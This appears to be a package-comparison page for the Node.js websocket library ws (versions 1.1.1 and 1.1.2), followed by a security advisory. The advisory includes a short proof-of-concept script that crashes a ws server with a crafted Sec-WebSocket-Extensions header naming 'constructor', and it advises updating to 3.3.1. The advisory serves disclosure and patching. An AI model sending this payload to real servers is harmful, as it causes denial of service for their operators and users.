Ws versions 1.1.1 and 1.1.2 are both websocket libraries for Node.js, designed for creating real-time applications. Both versions aim for simplicity, speed, and thorough testing, adhering to RFC-6455 standards. They share the same core dependencies: ultron for managing event listeners and options for handling configuration. Development dependencies like ansi, mocha, should, istanbul, benchmark, expect.js, tinycolor, bufferutil, and utf-8-validate also remain consistent, indicating a focus on maintaining the existing testing and performance metrics.
The primary difference lies in their release dates. Version 1.1.1 was released in June 2016, while version 1.1.2 came out in February 2017. This update of eight months suggests that version 1.1.2 likely includes bug fixes, performance enhancements, or minor feature additions that don't warrant a major or minor version bump. Javascript developers considering an upgrade to ws, should check the changelog of ws for specific details on those fixes and/or improvements. If you encounter strange behaviors on version 1.1.1 this updated version should be considered. Also, updating dependencies is a good habit.
All the vulnerabilities related to the version 1.1.2 of the package
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
Update to version 3.3.1 or later.